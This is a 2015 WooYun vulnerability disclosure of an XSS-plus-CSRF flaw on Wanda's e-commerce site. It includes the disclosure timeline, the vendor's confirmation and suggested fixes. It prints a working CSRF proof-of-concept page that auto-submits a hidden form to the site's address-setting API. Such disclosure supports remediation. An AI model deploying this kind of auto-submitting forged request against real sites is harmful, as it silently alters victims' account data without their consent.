当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114184

漏洞标题:万达电商一处xss+csrf双剑合璧

相关厂商:万达电商

漏洞作者: 小龙

提交时间:2015-05-15 11:08

修复时间:2015-06-29 11:32

公开时间:2015-06-29 11:32

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商已经确认,细节仅向厂商公开
2015-05-25: 细节向核心白帽子及相关领域专家公开
2015-06-04: 细节向普通白帽子公开
2015-06-14: 细节向实习白帽子公开
2015-06-29: 细节向公众公开

简要描述:

111

详细说明:

暴漫排版.png


可以看到上图,是没办法给别人触发的。。
这时收货地址有csrf哦

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>CSRF POC</title>
</head>
<body>
<form action="https://jr.ffan.com/crowdfunding/api/address/set" method="post">
<input type="hidden" name="name" value="test12345"/>
<input type="hidden" name="province_id" value="130000"/>
<input type="hidden" name="province" value="%E6%B2%B3%E5%8C%97%E7%9C%81"/>
<input type="hidden" name="city_id" value="130200"/>
<input type="hidden" name="city" value="130202"/>
<input type="hidden" name="county_id" value="130202"/>
<input type="hidden" name="county" value="%E8%B7%AF%E5%8D%97%E5%8C%BA"/>
<input type="hidden" name="detail" value="test1234"/>
<input type="hidden" name="address_id" value=""/>
<input type="hidden" name="zipcode" value=""/>
<input type="hidden" name="mobile_phone" value="13800138000"/>
<input type="hidden" name="area_code" value=""/>
<input type="hidden" name="phone value=""/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


漏洞证明:

让我们看看老公发的微博

QQ截图20150514090751.png


我想对我老公说:尼玛,我!的!眼!睛!
审核员可不要说self-xss了哦,我poc都放上去了。,居然都没过。。。

修复方案:

1:csrf加token
2:过滤特殊符号

版权声明:转载请注明来源 小龙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-15 11:31

厂商回复:

感谢小龙同学的关注与贡献!马上通知业务整改!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-19 09:55 | 大连万达集团(乌云厂商)

    小龙同学,私信留个Q啊

  2. 2015-05-20 10:13 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @大连万达集团 私信了没消息啊。。大哥。是私信你们那个业务的厂商啊。。